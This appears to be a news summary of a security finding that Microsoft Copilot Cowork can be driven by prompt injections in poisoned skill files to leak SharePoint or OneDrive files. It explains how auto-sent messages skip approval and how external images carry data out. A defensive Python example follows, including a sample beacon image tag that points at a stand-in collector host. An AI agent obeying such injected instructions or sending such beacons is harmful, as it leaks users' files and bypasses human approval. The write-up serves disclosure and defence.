Microsoft Copilot Cowork Vulnerable to File Exfiltration

Original: Microsoft Copilot Cowork Exfiltrates Files

Why This Matters

Highlights enterprise AI security risks as agents gain broader system access

Security researchers found that Microsoft Copilot Cowork can be made to exfiltrate files through indirect prompt injection. The weakness stems from the automatic approval of emails and Teams messages sent to users, which lets attackers steal data through compromised skills.

PromptArmor researchers discovered that Microsoft Copilot Cowork is vulnerable to file exfiltration through indirect prompt injection. The attack relies on the fact that sending emails and Teams messages to active users bypasses the human approval required for other sensitive actions. Attackers can upload poisoned skill files containing prompt injections that manipulate the agent into retrieving pre-authenticated download links for files in SharePoint or OneDrive. When users open the resulting messages, external images trigger network requests that carry the data out. The researchers achieved high success rates against state-of-the-art models, including Claude Opus. Microsoft's documentation states that Copilot asks permission for sensitive actions, but in practice messages to active users go out immediately, and there is no approval setting users can modify.
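As an added illustration (not code from PromptArmor, Microsoft, or the original article), the following Python models the approval gap described above and a hardened gate that inspects an outgoing message body for an external image beacon carrying a smuggled internal link; the tenant host names, the action names and the sample message bodies are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Constructed for this example: hosts the tenant treats as internal.
TRUSTED_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}
# Assumed action names for the two delivery paths the article says skip approval.
MESSAGE_ACTIONS = {"send_email", "send_teams_message"}
# Constructed message bodies: one carrying an exfil beacon, one benign.
BEACON_BODY = ('<p>Q3 report ready.</p><img src="https://collector.example/p.gif'
               '?u=https%3A%2F%2Fcontoso.sharepoint.com%2Fsites%2Ffinance%2Fq3.xlsx'
               '%3Ftoken%3DPLACEHOLDER_TOKEN">')
CLEAN_BODY = '<p>Q3 report ready.</p><img src="https://contoso.sharepoint.com/logo.png">'

class _ImgSrcs(HTMLParser):
    """Collect every <img src=...> value in a message body."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):  # HTMLParser lowercases names
        if tag == "img":
            self.srcs += [v for k, v in attrs if k == "src" and v]

def suspicious_images(body_html):
    """External <img> sources in the body, each flagged when its own URL
    carries (URL-encoded) a link back into the tenant: the shape a beacon
    takes when it smuggles a pre-authenticated download link."""
    parser = _ImgSrcs()
    parser.feed(body_html)
    found = []
    for src in parser.srcs:
        host = (urlparse(src).hostname or "").lower()
        if not host or host in TRUSTED_HOSTS:
            continue  # served from inside the tenant: not a beacon
        decoded = unquote(src).lower()  # undo %3A%2F%2F nesting
        found.append({"host": host,
                      "smuggles_internal_link": any(t in decoded for t in TRUSTED_HOSTS)})
    return found

def legacy_gate(action, recipient_active):
    """Rule as the article describes it: a message to an active user goes out
    immediately, every other sensitive action prompts. True = human must approve."""
    return not (action in MESSAGE_ACTIONS and recipient_active)

def hardened_gate(action, recipient_active, body_html):
    """Same rule, but a message that would auto-send is inspected first:
    any external image beacon forces the approval prompt."""
    if legacy_gate(action, recipient_active):
        return True
    return bool(suspicious_images(body_html))
```

The legacy gate shows why a poisoned skill only needs a message-sending action to succeed; the hardened gate keeps the product's convenience for clean messages while routing beacon-bearing ones to a human.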

Source

promptarmor.com